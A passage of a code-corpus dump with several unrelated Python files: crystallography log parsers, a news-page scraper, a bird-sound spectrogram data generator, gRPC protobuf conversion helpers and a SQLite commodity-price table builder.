as f:\n\t\t\tcontent = f.read()\n\t\t\tx = x+1\n\t\tif 'Average unit cell' in content:\n\t\t\tstore = content.index('Average unit cell:')\n\t\t\tlast = content.index('Selection',store)\n\t\t\tnewstr = content[store:last-1]\n\t\t\tout.append(newstr[:-5])\n\toutput = pprint.pformat(out)\n\tauc.write(output)\n\tresult = []\n\tfor data in out:\n\t\tnew = data[21:]\n\t\tnew = re.sub(' +', ' ', new)\n\t\tfloats = map(float, new.split(' '))\n\t\tfloats = filter(lambda a: a != 90.0, floats)\n\t\tfloats = filter(lambda a: a != 120.0, floats)\n\t\tnewstr = str(floats)\n\t\tresult.append(newstr)\n\tnumbers = '\\n'.join(result)\n\tnumbers = numbers.replace('[', '')\n\tnumbers = numbers.replace(']', '')\t\n\taucRed.write(numbers)\n\tauc.close()\n\taucRed.close()\n\t### combine unit cell with data\n\tcombined = []\n\tcombine = open(dir_output+\"/check.txt\", \"a\")\n\t#print list(cc12sorted), result\n\tfor d in range(len(cc12sorted)):\n\t\t#print cc12sorted[d]\n\t\tcombined.append([result[d],cc12sorted[d][0], cc12sorted[d][1][1]])\n\t#print combined\n\tcombine.write(pprint.pformat(combined))\n\tcombine.close()\n\n\n## if only one data set, pass through \ndef createAUC2(dir_output):\n\tcwd = os.getcwd()\n\n\tif os.path.exists(dir_output + '/cluster.txt'):\n\t\tos.remove(dir_output + '/cluster.txt')\n\n\tclust = open(dir_output+\"/cluster.txt\", \"a\")\n\tclust.write(\"cluster1q 1\")\n\tclust.close()\n\n\n## write 1-picc for clustering\ndef createPicc(dir_output):\n\tif os.path.exists(dir_output+\"/1-picc.txt\"):\n\t\tos.remove(dir_output+\"/1-picc.txt\")\n\n\t#Create 1-picc.txt file to be used in picc rejection\n\tpicc = open(dir_output+\"/1-picc.txt\", \"a\")\n\twith open(dir_output + \"/aimless.log\") as f:\n\t\tcontent = f.read()\n\t\tcbr = content.rfind(\"correlations by resolution\")\n\t\toverall = content.find(\"Overall\", cbr)\n\t\tzero = content.find(\"0\", overall)\n\t\tequal = content.find(\"=\", overall)\n\t\tnewstr = content[zero:equal-2]\n\t\tpicc.write(newstr)\n\t\tpicc.close()\n\n##### XTAL REJECTION #####\ndef createExtra(dir_output):\n\tcwd = os.getcwd()\n\n\ttmp = open(dir_output+\"/extra.txt\", \"a\")\n\twith open(cwd + \"/aimless.log\") as f:\n\t\tcontent = f.read()\n\t\tcm = content.find('Cumulative multiplicity')\n\t\tcc = content.find('Correlation coefficients',cm)\n\t\tfdollar = content.find('$$', cm)\n\t\tbatch = content.find('Batch', fdollar)\n\t\tln = content.rfind('$$', cm, cc)\n\t\tnew = content[batch-4:ln]\n\t\ttmp.write(new)\n\t\ttmp.close()\n\ndef createSmr(dir_output):\n\tcwd = os.getcwd()\n\tsmr = open(dir_output+\"/SmRmerge.txt\", \"a\")\n\twith open(dir_output + \"/extra.txt\") as f:\n\t\tln = f.readlines()\n\t\tfor x in ln[1:]:\n\t\t\tx = re.sub(' +', ' ', x)\n\t\t\txnew = x.split(' ')\n\t\t\txnew[15] = str(math.sqrt(float(xnew[15])*float(xnew[15])))\n\t\t\tx = \" \".join(xnew)\n\t\t\tsmr.write(str(x))\n\t\tsmr.close()\n\ndef createBatch(dir_output):\n\tcwd = os.getcwd()\n\tbatch = open(dir_output+\"/batch.txt\", \"a\")\n\twith open(cwd+\"/pointless.log\") as f:\n\t\tln = f.read()\n\t\ts = ln.find(\">*> Summary of test data read in:\")\n\t\te = ln.find(\"===\", s)\n\t\tdegrees = ln.rfind(\"degrees\", s, e)\n\t\tln = ln[s:degrees]\n\t\tx = re.sub(' +', ' ', ln)\t\n\t\tx = x.split('\\n')\n\t\tfor item in x:\n\t\t\tif item.startswith(\" Run number: \"):\n\t\t\t\tstart = item.index(\":\")\n\t\t\t\tc = item.index(\" consists\")\n\t\t\t\tfirst = item[start+2:c]\n\t\t\t\tcob = item.index(\"batches \")\n\t\t\t\tdash = item.index(\"- \")\n\t\t\t\ts = item[cob+8:dash]\n\t\t\t\tl = item[dash+2:]\n\t\t\t\tbatch.write(first+' ')\n\t\t\t\tbatch.write(s)\n\t\t\t\tbatch.write(l+\"\\n\")\n\t\tbatch.close()\n\n## dataset number, smr start and end frame\ndef createTmp3a(dir_output):\n\tcwd = os.getcwd()\n\n\tif os.path.exists(dir_output+\"/tmp3_smr.txt\"):\n\t\tos.remove(dir_output+\"/tmp3_smr.txt\")\n\n\twith open(dir_output+\"/batch.txt\") as f:\n\t\tcontent = f.readlines()\n\t\tse = {}\n\t\tfor element in content:\n\t\t\tfspace = element.find(' ')\n\t\t\tsspace = element.rfind(' ')\n\t\t\tstart = int(element[fspace+1:sspace])\n\t\t\tend = int(element[sspace+1:])\n\t\t\tse[start] = end\n\t\tse = sorted(se.iteritems())\n\n\tsmr = open(dir_output+\"/tmp3_smr.txt\", \"a\")\n\twith open(dir_output+\"/SmRmerge.txt\") as f2:\n\t\tcontent2 = f2.readlines()\n\t\ty=1\n\t\tfor x in range(len(se)):\n\t\t\tstart = se[x][0]\n\t\t\tend = se[x][1]\n\t\t\ttmp = []\n\t\t\tfor ln in content2:\n\t\t\t\tln = re.sub(' +', ' ', ln)\n\t\t\t\tln = ln.split(' ')\n\t\t\t\ttf = int(ln[2])>=start\n\t\t\t\ttf2 = int(ln[2]) <= end\n\t\t\t\tif tf&tf2 == True:\n\t\t\t\t\ttmp.append(float(ln[15]))\n\t\t\tif len(tmp)>0:\n\t\t\t\tavg = sum(tmp)/len(tmp)\n\t\t\t\tsmr.write(str(y) + ' ' + str(avg) + ' ' + str(start) + ' ' +str(end)+'\\n')\n\t\t\t\ty = y+1\n\t\tsmr.close()\n\n## sorted dataset number, smr start and end frame\ndef createTmp3b(dir_output):\n\t#sort SmRmerge numbers and add them to tmp3_smr2.txt\n\tif os.path.exists(dir_output+\"/tmp3_smr2.txt\"):\n\t\tos.remove(dir_output+\"/tmp3_smr2.txt\")\n\n\tsmr = open(dir_output+\"/tmp3_smr2.txt\", \"a\")\n\twith open(dir_output+\"/tmp3_smr.txt\") as f:\n\t\tcontent = f.readlines()\n\t\tcontent2 = []\n\t\tfor ln in content:\n\t\t\tln = re.sub(' +', ' ', ln)\n\t\t\tln = ln.split(' ')\n\t\t\tcontent2.append(ln)\n\t\tresult = sorted(content2, key=lambda x: x[1])\n\t\tfor s in result:\n\t\t\tx = ' '.join(s)\n\t\t\tsmr.write(x)\n\t\tsmr.close()\n\treturn result\n\t\ndef createBdecay(dir_output):\n\tif os.path.exists(dir_output+\"/Bdecay.txt\"):\n\t\tos.remove(dir_output+\"/Bdecay.txt\")\n\n\tbd = open(dir_output+\"/Bdecay.txt\", \"a\")\n\twith open(dir_output+\"/aimless.log\") as aim:\n\t\tcontent = aim.read()\n\t\trb = content.find(\"Relative Bfactor\")\n\t\tab = content.find(\"Agreement between batches\")\n\t\tdr = content.rfind(\"$$\", rb, ab)\n\t\tbf = content.find(\" 1\", rb, dr)\n\t\tnew = content[bf:dr]\n\t\tbd.write(new)\n\t\tbd.close()\n\ndef createSmrTmp4(path, xtal_steps, dir_output):\t\n\tcc12sorted = createFs(path, dir_output)\n\tif os.path.exists(dir_output+\"/tmp4.txt\"):\n\t\tos.remove(dir_output+\"/tmp4.txt\")\n\n\tsmr = open(dir_output + \"/smr_included.txt\", \"a\")\n\ttmp4 = open(dir_output+\"/tmp4.txt\", \"a\")\n\twith open(dir_output+\"/tmp3_smr2.txt\") as f:\n\t\ttrackFiles = []\n\t\ttrackFold = []\n\t\tcontent = f.readlines()\n\t\ttotal = len(content)\n\t\tcontent = content[:total-xtal_steps]\n\t\tfor s in content:\n\t\t\tfspace = s.find(' ')\n\t\t\tsmr.write(s[:fspace]+'\\n')\n\t\t\tnumber = int(s[:fspace])-1\n\t\t\ttrackFold.append(str(cc12sorted[number][0]))\n\t\t\ttrackFiles.append(cc12sorted[number][1][2])\n\t\t\ttmp4.write('HKLIN ../' + str(cc12sorted[number][0])+ \"/integrated\" + cc12sorted[number][1][2][7:-4] + \".mtz\" + \"\\n\")\n\t\tsmr.close()\n\t\ttmp4.close()\n","sub_path":"helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":9436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"606630648","text":"import urllib\nimport urllib.request\nimport urllib.parse\nimport re\nimport time\n\nurl = 'http://www.itjuzi.com/news'\nheaders = {'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0'}\n\nlinkre = re.compile('href=\\\"(.+?)')\ntopre = re.compile('(.+?)\\\">')\nbotre = re.compile('\\\">(.+?)')\nf = open(\"E:\\documents\\itjuzi0710.txt\",'a')\nfor i in range(100):\n curl=url+'?page='+str(i)\n req = urllib.request.Request(url=curl, headers=headers)\n response = urllib.request.urlopen(req).read()\n page = response.decode('UTF-8')\n print(\"now processing on page\"+str(i))\n #titlere = re.compile('(.+?)')\n #linkre = re.compile('href=\\\"(.+?)')\n #print(linkre.findall(page))\n #f = open(\"E:\\documents\\guokr1.txt\",'a')\n #f.write('\\n'+linkre.findall(page)[]+url)\n #f.close()\n for x in linkre.findall(page):\n if 'overview'in x:\n f.write('\\n'+topre.findall(x)[-1]+\" \"+botre.findall(x)[-1])\n time.sleep(3)\nf.close()","sub_path":"catch5.py","file_name":"catch5.py","file_ext":"py","file_size_in_byte":1011,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"310350367","text":"import pandas as pd\nimport os\nimport matplotlib.pyplot as plt\nimport random\n\nimport numpy as np\nimport cv2\n\nfrom sklearn.utils import shuffle\n# from augmentation import augment\nimport threading\nimport time\n\n# TODO: using cv2.imread to get data\ncurrent_path = os.getcwd()\n# logging.basicConfig(filename='my.log')\n#TODO(11/13):在这里进行数据加强,在之前做数据做数据加强行不通\n\nclass Data_Gener():\n def __init__(self, mode, Img_size, label_path, limit_species=None):\n '''\n :param mode: To choose what kind the model base on ,(family\\genus\\species)\n :param label_path: the file including kinds' info (Family:['af','bf'...],Genus:['ag','bg',...])\n '''\n self.mode = mode\n\n # label_info is a dict that keys is the name of (family\\genus\\species) and the values is digit ID\n self.label_info = self._label_info(label_path)\n\n # To limit the species in case to check whether the model get the optimal\n self.limit = limit_species\n if limit_species:\n self.label_info = dict(zip(\n list(self.label_info.keys())[:limit_species],\n range(limit_species)\n ))\n\n self.RANDOM = np.random.RandomState(3)\n self.IM_AUGMENTATION = { # 'type':[probability, value]\n #'roll': [0.3, (0.0, 0.05)],\n 'noise': [0.2, 0.01],\n 'noise_samples': [0.4, 0.1],\n 'brightness': [0.5, (0.25, 1.25)],\n 'crop': [0.4, 0.07],\n # 'flip': [0.2, 1]\n }\n self.IM_SIZE = Img_size # W, H\n\n\n\n def data_gener(self, data_file_path, spec_path, aug):\n '''\n :param data_file_path: a path of pd.DataFrame instance including an item infos:\n e.g. item:{'ClassID':fupfmb,\n 'Family':Thamnophilidae\n 'FileName':LIFECLEF2014_BIRDAMAZON_XC_WAV_RN100.wav\n 'Genus':Hylophylax,\n 'Species':punctulatus}\n :param spec_path: From the data_file we get the FileName and this param get the full path of data\n '''\n\n\n if type(data_file_path) == bytes:\n data_file_path = data_file_path.decode('ascii')\n file = pd.read_csv(data_file_path)\n\n if self.limit:\n file = file[file.Species.isin(self.label_info.keys())]\n data = file\n\n # cause tensorflow will post str in byte mode.\n if type(spec_path) == bytes:\n spec_path = spec_path.decode('ascii')\n data_path = spec_path\n\n # TODO: make a one image and label output file which delete `batch` element\n i = 0\n data = shuffle(data)\n data = data.reset_index(drop=True)\n while i < data.shape[0]:\n # print('New round begining')\n item = data.iloc[i]\n i += 1\n\n # Get the the FileName's directory path\n FileName = item['FileName']\n # TODO:做一个文件夹的说明图(百度搜索目录结构图)\n file_dir = os.path.join(data_path, FileName.split('.')[0])\n\n # TODO(solved, Use data_check.py): Cause some file will not exist, the num of batch will be less than batch_size\n if not os.path.exists(file_dir):\n # cause some audio will be regard as a noise audio\n # And some species just get one or two audios\n # So the file_dir will not exist\n raise FileExistsError('{} dose not exist'.format(file_dir))\n\n img = self._img_get2(file_dir)\n # print(img.shape)\n if img.shape != (self.IM_SIZE[0], self.IM_SIZE[1]):\n print('The error file name is %s' % FileName)\n # LIFECLEF2017_BIRD_XC_WAV_RN49356.wav\n continue\n\n # self._imageAugmentation will do the augmentation job, but there is a probability that img doesn't get aug\n if aug:\n img = self._imageAugmentation(img, probability=0.8)\n\n # Save label\n # The family/genus/species name\n label_name = item['Species']\n #\n label = [0] * len(self.label_info.keys())\n label[int(self.label_info[label_name])] = 1\n\n yield img, label\n\n def data_size(self, filep):\n file = pd.read_csv(filep)\n if self.limit:\n file = file[file.Species.isin(self.label_info.keys())]\n return file.shape[0]\n\n # The function get the img data from provided path\n def _img_get2(self, FileDirPath):\n #print('One Data Loading')\n file_name = random.sample(os.listdir(FileDirPath), 1)[0]\n path = os.path.join(FileDirPath, file_name)\n img = plt.imread(path)\n IM_SIZE = self.IM_SIZE\n if img.shape != (IM_SIZE[0], IM_SIZE[1]):\n # TODO: It may be caused because of different win_len and I forget to resize it\n # The error img shape is (400, 109)\n # The error img shape is (400, 235)\n # print('The error img shape is {}'.format(img.shape))\n print('Occurs error img {}'.format(file_name))\n img = cv2.resize(img, (IM_SIZE[1], IM_SIZE[0]))\n\n # logging.error('The error file path is %s' %file_name)\n # print('The error file path is %s' % path)\n #print('One Data Loaded')\n img -= img.min()\n img /= img.max()\n return img*255\n\n def _return_noise(self, listdir=r'G:\\dataset\\BirdClef\\paper_dataset\\spectrum\\noise'):\n RANDOM = self.RANDOM\n lists = os.listdir(listdir)\n file_path = RANDOM.choice(lists)\n return plt.imread(os.path.join(listdir, file_path))\n\n def _imageAugmentation(self, img, count=3, probability=0.7):\n RANDOM = self.RANDOM\n IM_SIZE = self.IM_SIZE\n AUG = self.IM_AUGMENTATION\n\n while (count >0 and len(AUG) > 0):\n if RANDOM.choice([True, False], p=[probability, 1 - probability]):\n # Random Crop (without padding)\n if'crop' in AUG and RANDOM.choice([True, False], p=[AUG['crop'][0], 1 - AUG['crop'][0]]):\n h, w = img.shape[:2]\n cropw = RANDOM.randint(1, int(float(w) * AUG['crop'][1]))\n croph = RANDOM.randint(1, int(float(h) * AUG['crop'][1]))\n img = img[croph:-croph, cropw:-cropw]\n # TODO:注意cv2 resize顺序\n img = cv2.resize(img, (IM_SIZE[1], IM_SIZE[0],))\n\n # Flip - 1 = Horizontal, 0 = Vertical\n elif 'flip' in AUG and RANDOM.choice([True, False], p=[AUG['flip'][0], 1 - AUG['flip'][0]]):\n img = cv2.flip(img, AUG['flip'][1])\n\n # Wrap shift (roll up/down and left/right)\n elif 'roll' in AUG and RANDOM.choice([True, False], p=[AUG['roll'][0], 1 - AUG['roll'][0]]):\n img = np.roll(img, int(img.shape[0] * (RANDOM.uniform(-AUG['roll'][1][1], AUG['roll'][1][1]))), axis=0)\n img = np.roll(img, int(img.shape[1] * (RANDOM.uniform(-AUG['roll'][1][0], AUG['roll'][1][0]))), axis=1)\n\n # substrac/add mean\n elif 'mean' in AUG and RANDOM.choice([True, False], p=[AUG['mean'][0], 1 - AUG['mean'][0]]):\n img += np.mean(img) * AUG['mean'][1]\n\n # gaussian noise\n # TODO:可以增加自己提取的噪声\n elif 'noise' in AUG and RANDOM.choice([True, False], p=[AUG['noise'][0], 1 - AUG['noise'][0]]):\n img += RANDOM.normal(0.0, RANDOM.uniform(0, AUG['noise'][1] ** 0.5), img.shape)\n img = np.clip(img, 0.0, 1.0)\n\n # add noise samples\n elif 'noise_samples' in AUG and RANDOM.choice([True, False], p=[AUG['noise_samples'][0], 1 - AUG['noise_samples'][0]]):\n noise = self._return_noise()\n img += noise*AUG['noise_samples'][1]\n img -= img.min(axis=None)\n img /= img.max(axis=None)\n\n # adjust brightness\n elif 'brightness' in AUG and RANDOM.choice([True, False], p=[AUG['brightness'][0], 1 - AUG['brightness'][0]]):\n img *= RANDOM.uniform(AUG['brightness'][1][0], AUG['brightness'][1][1])\n img = np.clip(img, 0.0, 1.0)\n count -= 1\n # show\n # cv2.imshow(\"AUG\", img)#.reshape(IM_SIZE[1], IM_SIZE[0], IM_DIM))\n # cv2.waitKey(-1)\n\n return img\n\n # In one training time, This function will be called only one time\n def _label_info(self, label_path):\n try:\n df = pd.read_csv(label_path)\n except:\n df = pd.read_excel(label_path)\n label = set(df.Species.tolist())\n label_info = dict(zip(label, range(len(label))))\n return label_info\n\n # Label genor, using one time is enough, return csv file that includes three kinds of label\n\n\nif __name__ == '__main__':\n label_path = r'G:\\dataset\\BirdClef\\vacation\\source.csv'\n mode = 'Species'\n data_file_path2 = r'G:\\dataset\\BirdClef\\vacation\\train_file\\target'\n data_file_path1 = r'G:\\dataset\\BirdClef\\vacation\\train_file\\source\\source_train.csv'\n spec_path = r'G:\\dataset\\BirdClef\\paper_dataset\\spectrum'\n source_gener = Data_Gener(mode=mode, Img_size=[256, 512], label_path=label_path, limit_species=10)\n train_source = source_gener.data_gener(data_file_path=data_file_path1,\n spec_path=spec_path,aug=True)\n next(train_source)\n #train_gen1, train_num1 = gener.data_gener(data_file_path=data_file_path1, BatchSize=8, label_type='source',\n # spec_path=spec_path, mode=mode, aug=False, use_thread=True)\n #train_gen2, train_num2 = gener.data_gener(data_file_path=data_file_path2, BatchSize=8, label_type='target',\n # spec_path=spec_path, mode=mode, aug=False, use_thread=False)\n num = 0\n start1 = time.time()\n while num < 300:\n #if num % 10000000 == 0:\n # print('The next num is %d'%num)\n _, _ = next(test_source)\n #print('The label {} \\n'.format(np.argmax(labels, axis=1)))\n num += 1\n #print(labels.argmax(axis=1))\n end1 = time.time()\n consume1 = end1 - start1\n\n start2 = time.time()\n while num < 200:\n #if num % 10000000 == 0:\n # print('The next num is %d'%num)\n _, _ = next(train_source)\n #print('The label {} \\n'.format(np.argmax(labels, axis=1)))\n num += 1\n #print(labels.argmax(axis=1))\n end2 = time.time()\n consume2 = end2 - start2\n print('The time that not use safe-thread consume {}'.format(consume1))\n print('The time that use safe-thread consume {}'.format(consume2))\n\n","sub_path":"Preprocessing/generator/generator_for_tf.py","file_name":"generator_for_tf.py","file_ext":"py","file_size_in_byte":11044,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"636455847","text":"### Functions for URL to file name conversion ###\n\nimport os\nimport re\nimport time\nimport sys\nfrom urllib import quote_plus\n\n# The .png or .jpg at the end of the file sufix controls \n# the image format of the file. \n# The tomcat servlet expects png.\nimageType = \".png\"\nfileSufix = \"Image\" + imageType\n\ndef queryToPath(queryStr):\n \"\"\"Convert the query string of a URL to a path\"\"\" \n return \"/\".join(map(quote_plus, queryStr.split(\"&\")))\n \ndef urlToFileName(url):\n \"\"\"Convert the URL and query string into a file path.\n The returned string will not start with a slash. \"\"\"\n urlToPathAndQuery = re.compile(r\"^http://([^\\?]*)\\?(.*)\")\n match = urlToPathAndQuery.match(url)\n \n filename = None\n \n if match is not None:\n # query found, try this:\n filename = match.groups()[0] + \"/\" + queryToPath(match.groups()[1])\n else:\n urlregex = re.compile(r\"^http://(.*)$\")\n match = urlregex.match(url)\n if match is not None:\n filename= match.groups()[0]\n else:\n # not sure what it is but it might be a hostname\n filename = url\n \n return filename.replace('%','_') + fileSufix\n \n\ndef fileNameToThumbnailName( filename ):\n return 'thumbnail.' + filename\n \n","sub_path":"webImageCapture/captureUrls.py","file_name":"captureUrls.py","file_ext":"py","file_size_in_byte":1193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"642042297","text":"import json\nfrom shiva.helpers.timers import timed\n\nfrom shiva.core.communication_objects.specs_pb2 import (\n SpecsProto, ActionSpaceProto, EnvSpecsProto, MultiEnvSpecsProto, LearnerSpecsProto\n)\nfrom shiva.core.communication_objects.configs_pb2 import ConfigProto\nfrom shiva.core.communication_objects.helpers_pb2 import SimpleMessage\nfrom shiva.core.communication_objects.enums_pb2 import ComponentType\n\n@timed\ndef from_dict_2_ConfigProto(configs: dict) -> ConfigProto:\n config_proto = ConfigProto()\n config_proto.data = json.dumps(configs)\n return config_proto\n\ndef from_ConfigProto_2_dict(config_proto: ConfigProto) -> dict:\n config = json.loads(config_proto.data)\n return config\n\n@timed\ndef from_dict_2_ObservationsProto(observations):\n assert \"NotImplemented\"\n\n@timed\ndef from_ObservationsProto_2_dict():\n assert \"NotImplemented\"\n\n@timed\ndef from_dict_2_ActionsProto():\n assert \"NotImplemented\"\n\n@timed\ndef from_ActionsProto_2_dict():\n assert \"NotImplemented\"\n\n@timed\ndef from_dict_2_TrajectoriesProto():\n assert \"NotImplemented\"\n\n@timed\ndef from_TrajectoriesProto_2_dict():\n assert \"NotImplemented\"\n\n@timed\ndef from_dict_2_NewAgentsConfigProto():\n assert \"NotImplemented\"\n\n@timed\ndef from_NewAgentsConfigProto_2_dict():\n assert \"NotImplemented\"\n\n@timed\ndef from_dict_2_TrainingMetricsProto():\n assert \"NotImplemented\"\n\n@timed\ndef from_EvolutionMetricProto_2_dict():\n assert \"NotImplemented\"\n\n@timed\ndef from_dict_2_EvolutionMetricProto():\n assert \"NotImplemented\"\n\n@timed\ndef from_TrainingMetricsProto_2_dict():\n assert \"NotImplemented\"\n\n@timed\ndef from_dict_2_EvolutionConfigProto():\n assert \"NotImplemented\"\n\n@timed\ndef from_EvolutionConfigProto_2_dict():\n assert \"NotImplemented\"\n\n@timed\ndef from_dict_2_MultiEnvSpecsProto(menv_specs: dict) -> MultiEnvSpecsProto:\n menv_specs_proto = MultiEnvSpecsProto()\n menv_specs_proto.num_envs = menv_specs['num_envs']\n menv_specs_proto.env_specs.observation_space = menv_specs['env_specs']['observation_space']\n menv_specs_proto.env_specs.action_space.discrete = menv_specs['env_specs']['action_space']['discrete']\n menv_specs_proto.env_specs.action_space.param = menv_specs['env_specs']['action_space']['param]']\n menv_specs_proto.env_specs.action_space.acs_space = menv_specs['env_specs']['action_space']['acs_space']\n menv_specs_proto.env_specs.num_agents = menv_specs['env_specs']['num_agents']\n return menv_specs_proto\n\n@timed\ndef from_MultiEnvSpecsProto_2_dict(menv_specs_proto):\n menv_specs = {}\n menv_specs['num_envs'] = menv_specs.num_envs\n menv_specs['env_specs'] = from_EnvSpecsProto_to_dict(menv_specs.env_specs)\n return menv_specs\n\ndef from_dict_2_ActionSpaceProto(action_space: dict) -> ActionSpaceProto:\n action_space_proto = ActionSpaceProto()\n action_space_proto.discrete = action_space['discrete']\n action_space_proto.param = action_space['param']\n action_space_proto.acs_space = action_space['acs_space']\n return action_space_proto\n\ndef from_ActionSpaceProto_2_dict(action_space_proto: dict) -> dict:\n action_space = {}\n action_space['discrete'] = action_space_proto.discrete\n action_space['param'] = action_space_proto.param\n action_space['acs_space'] = action_space_proto.acs_space\n return action_space\n\n@timed\ndef from_dict_2_EnvSpecsProto(env_specs: dict):\n env_specs_proto = EnvSpecsProto()\n env_specs_proto.observation_space = env_specs['observation_space']\n env_specs_proto.action_space.discrete = env_specs['action_space']['discrete']\n env_specs_proto.action_space.param = env_specs['action_space']['param']\n env_specs_proto.action_space.acs_space = env_specs['action_space']['acs_space']\n env_specs_proto.num_agents = env_specs['num_agents']\n return env_specs_proto\n\n@timed\ndef from_EnvSpecsProto_to_dict(env_specs_proto: EnvSpecsProto) -> dict:\n env_specs = {}\n env_specs['observation_space'] = env_specs_proto.observation_space\n env_specs['action_space'] = from_ActionSpaceProto_2_dict(env_specs_proto.action_space)\n env_specs['num_agents'] = env_specs_proto.num_agents\n return env_specs\n\n@timed\ndef from_LearnerSpecsProto_2_dict(learner_specs_proto: LearnerSpecsProto) -> dict:\n learner_specs = {}\n learner_specs['data'] = json.load(learner_specs_proto.data)\n return learner_specs\n\n@timed\ndef from_dict_2_SpecsProto(specs: dict) -> SpecsProto:\n specs_proto = SpecsProto()\n specs_proto.id = specs['id']\n specs_proto.type = specs['type']\n if 'address' in specs:\n specs_proto.address = specs['address']\n if specs['type'] == ComponentType.LEARNER:\n specs_proto.learner.data = json.dumps(specs['data'])\n elif specs['type'] == ComponentType.MULTIENV:\n specs_proto.menv.num_envs = specs['num_envs']\n specs_proto.menv.env_specs.observation_space = specs['env_specs']['observation_space']\n specs_proto.menv.env_specs.action_space.discrete = specs['env_specs']['action_space']['discrete']\n specs_proto.menv.env_specs.action_space.param = specs['env_specs']['action_space']['param']\n specs_proto.menv.env_specs.action_space.acs_space = specs['env_specs']['action_space']['acs_space']\n elif specs['type'] == ComponentType.ENVIRONMENT:\n pass\n return specs_proto\n\n@timed\ndef from_SpecsProto_2_dict(specs_proto: SpecsProto) -> dict:\n specs = {}\n specs['id'] = specs_proto.id\n specs['type'] = specs_proto.type\n if specs_proto.type == ComponentType.LEARNER:\n specs['learner'] = from_LearnerSpecsProto_2_dict(specs_proto.learner)\n elif specs_proto.type == ComponentType.MULTIENV:\n specs['menv'] = from_MultiEnvSpecsProto_2_dict(specs_proto.menv)\n elif specs_proto.type == ComponentType.ENVIRONMENT:\n specs['env'] = from_EnvSpecsProto_to_dict(specs_proto.env)\n return specs\n\n@timed\ndef from_dict_2_JsonMessage(msg) -> JsonMessage:\n simple = JsonMessage()\n simple.data = json.dumps(msg)\n return simple\n\n@timed\ndef from_JsonMessage_2_dict(simple_msg: JsonMessage) -> dict:\n return json.load(simple_msg.data)\n\n@timed\ndef from_SimpleMessage_2_int(simple_msg_proto: SimpleMessage) -> int:\n assert \"Implementation not checked\"\n return int(simple_msg_proto.data)\n\n@timed\ndef from_SimpleMessage_2_string(simple_msg_proto: SimpleMessage) -> str:\n assert \"Implementation not checked\"\n return str(simple_msg_proto.data)\n\n@timed\ndef from_dict_2_StatusProto():\n assert \"NotImplemented\"\n\n@timed\ndef from_StatusProto_2_dict():\n assert \"NotImplemented\"\n\n\n\n\n#\n#\n#\n#\n#\n#\n\ndef from_action_to_EnvStepInput(actions, command='step'):\n '''\n Need to set convention of actions shape with everybody\n '''\n env_in = EnvStepInput()\n\n fake_id = 0\n\n if len(actions.shape) == 1:\n # 1 Agent, 1 Instance\n action_obj = env_in.agent_actions[str(fake_id)].data.add()\n action_obj.data.extend(actions.tolist())\n if len(actions.shape) == 2:\n # 1 Agent, n Instances\n for instance_n in actions:\n action_obj = env_in.agent_actions[str(fake_id)].data.add()\n action_obj.data.extend(actions[instance_n])\n if len(actions.shape) == 3:\n # m Agents, n Instances\n for agent_m in range(actions.shape[0]):\n action_obj = env_in.agent_actions[str(fake_id)].data.add()\n for instance_n in range(actions.shape[1]):\n action_obj.data.extend(actions[agent_m, instance_n])\n fake_id += 1\n\n env_in.command = EnvironmentCommand.STEP\n return env_in\n\ndef from_EnvStepOutput_to_trajectories(env_output):\n '''\n This helper parses the EnvStepOutput into a dictionary @trajectories\n '''\n agent_ids = list(env_output.agent_states.keys())\n trajectories = {}\n for a_id in agent_ids:\n trajectories[a_id] = []\n for state in list(env_output.agent_states[a_id].data):\n trajectories[a_id].append([state.next_observation.data, state.reward, state.done, {}])\n return trajectories\n\ndef from_EnvStepOutput_to_metrics(env_output):\n agent_ids = list(env_output.agent_metrics.keys())\n agent_id = agent_ids[0] # SINGLE AGENT PROCESSING\n metric = {}\n for a_id in agent_ids:\n metric[a_id] = env_output.agent_metrics[a_id].data[0]\n return metric","sub_path":"shiva/archive/eze/grpc_utils.py","file_name":"grpc_utils.py","file_ext":"py","file_size_in_byte":8264,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"621921305","text":"import pandas as pd\nfrom sql_control import SqlControl\n\nclass Spot(SqlControl):\n def __init__(self):\n print(\"Start to create spot.\")\n # server start\n #sf database\n SqlControl.__init__(self)\n SqlControl.open_sf_conn(self)\n #Commodity database\n SqlControl.open_commodity_conn(self)\n self.spot_tb_name = 'spot'\n #------------------------------------------------------------------------------------------\n sfTbList = self.table_list() # table name list from sf database\n tbName = sfTbList[-1] # last table of sf\n spotList = self.get_spot_name(tbName)\n self.create_spot_tb(spotList, sfTbList) # create the commodity db\n self.insert_commodity(spotList, sfTbList)\n self.storage_spot_to_excel() #read spot db and to excel\n #------------------------------------------------------------------------------------------\n #close server\n SqlControl.close_commodity_conn(self)\n SqlControl.close_sf_conn(self)\n print(\"Spot table created!\")\n\n #return table name string in list\n def table_list(self):\n tbList = self.sf_cursor.execute(\"SELECT name FROM sqlite_master WHERE type='table'order by name;\").fetchall()\n for i in range(len(tbList)):\n tbList[i] = tbList[i][0]\n return tbList\n\n def create_spot_tb(self, spotList, sfTbList):\n tbName = self.spot_tb_name # name of the table with all commodity.\n #check if table existed than delete the table\n if self.check_table(tbName):\n sqlDrop = \"DROP TABLE {0};\".format(tbName)\n self.com_cursor.execute(sqlDrop)\n # create an empty table only with id and date in string\n sqlCreate = \"CREATE TABLE {0} ('日期' text primary key);\".format(tbName)\n self.com_cursor.execute(sqlCreate)\n # use loop to add all spot into the table as field\n for s in spotList:\n sqlAddSpot = \"ALTER table {0} add '{1}' real;\".format(tbName, s)\n self.com_cursor.execute(sqlAddSpot)\n # insert the dateTime to the spot table as index, later for updating the table data with sql update wording\n for sf in sfTbList:\n # get table date time as string, in order to store into the spot list as index\n dateTime = sf.replace(\"sf\", \"\")\n sqlDate = \"INSERT INTO {0} ('日期') VALUES ({1});\".format(tbName, dateTime)\n self.com_cursor.execute(sqlDate)\n\n def get_spot_name(self, tbName):\n #read the lastest database and return the name list of spot\n sql = \"SELECT 商品 from {0};\".format(tbName)\n spotList = self.sf_cursor.execute(sql).fetchall()\n for i in range(len(spotList)):\n spotList[i] = spotList[i][0]\n return spotList\n\n 